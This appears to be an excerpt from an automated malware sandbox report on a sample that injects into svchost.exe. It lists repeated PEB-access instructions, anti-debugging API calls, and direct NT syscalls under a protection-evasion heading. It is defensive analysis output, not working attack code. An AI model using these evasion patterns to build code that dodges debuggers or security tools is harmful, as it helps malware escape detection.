                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]1_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]1_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B09D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtSetInformationThread: Direct from: 0x76EF63F9
